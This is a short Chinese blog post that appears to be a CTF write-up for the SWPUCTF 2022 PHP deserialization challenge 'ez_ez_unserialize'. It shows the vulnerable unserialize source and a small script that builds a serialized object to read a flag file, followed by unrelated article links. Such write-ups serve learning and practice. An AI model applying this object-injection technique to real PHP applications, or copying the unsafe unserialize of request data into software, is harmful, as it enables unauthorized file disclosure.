复健第二天之[SWPUCTF 2022 新生赛]ez_ez_unserialize

<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

<?php

class X
{
    public $x = 'fllllllag.php';
}

$a = new X;
echo serialize($a);

?>

• 上一篇：[leetcode]（找到vector中的特定元素并删除）无重复字符的最长子串
• 下一篇：MySQL入门（数据库、数据表、数据、字段的操作以及查询相关sql语法）

相关文章

• 【PowerShell专栏】PowerShell脚本执行策略。

  在实际的脚本应用过程中，很多时候我们都会将策略修改为Unrestricted，这其实是一种危险行为，如果是一类常用脚本，我们可以想办法使用数字签名技术完成脚本的Signed.在进行PowerShell

  阅读更多2025-01-20
• leetcode - 1368. Minimum Cost to Make at Least One Valid Path in a Grid

  leetcode - 1368

  阅读更多2025-01-19
• [Easy] leetcode-13 罗马数字转整数

  数字 1 在数字 5 的左边，所表示的数等于大数 5 减小数 1 得到的数值 4。同样地，数字 9 表示为。通常情况下，罗马数字中小的数字在大的数字的右边。但也存在特例，例如 4 不写做。给定一个罗马

  阅读更多2025-01-19
• 匠人天工Ai浮雕网站创新发布了ZBrush插件，提效500%，为AI+数字雕刻行业带来新的活力

  此外，插件还支持多张灰度图的叠加，能够生成更为复杂和精细的3D模型，满足了设计师在创作过程中对细节的高要求。2025年1月6日，杭州——杭州仓颉造梦数字科技公司旗下产品匠人天工近日宣布推出一款创新的Z

  阅读更多2025-01-19
• 使用libwebsocket技术总结

  network.http.spdy.websockets，如果不禁用，会导致libwebsocket无法建立wss连接。编译minimal-examples\ ws-server\minimal-ws

  阅读更多2025-01-19
• 电子应用设计方案95：智能AI热水瓶系统设计

  热水瓶系统设计方案结合了先进的技术和人性化的设计，为用户带来更智能、便捷和安全的热水使用体验。在实际开发过程中，可根据用户反馈和市场需求不断优化和完善产品功能。热水瓶系统旨在为用户提供更便捷、安全和个

  阅读更多2025-01-19
• springboot 集成javaFx 多个面板之间设置窗口大小,最大化设置

  如果想看下博主的项目代码层级结构可查看博主的。

  阅读更多2025-01-19
• SpringBoot的AOP-入门

  下面这个切入点表达式选定的是这个包下所有的方法！指定方法需要：包名、类名（接口名）、方法名。最前面那个（*）星号表示是。

  阅读更多2025-01-19
• 豆包MarsCode：构造特定数组的逆序拼接

  核心逻辑：通过两层循环实现从n到i的逆序拼接。时间复杂度On2O(n^2)On2，因为内外循环的嵌套导致操作次数随着nnn增加而呈二次增长。空间复杂度On2O(n^2)On2，因为我们创建了一个长度为

  阅读更多2025-01-19
• Selenium自动化测试（基于python）

  1.1Selenium是一款主要用于Web应用程序自动化测试的工具集合。Selenium测试直接运行在浏览器中，本质是通过驱动浏览器，模拟浏览器的操作，比如跳转、输入、点击、下拉等，来拿到网页渲染之后

  阅读更多2025-01-19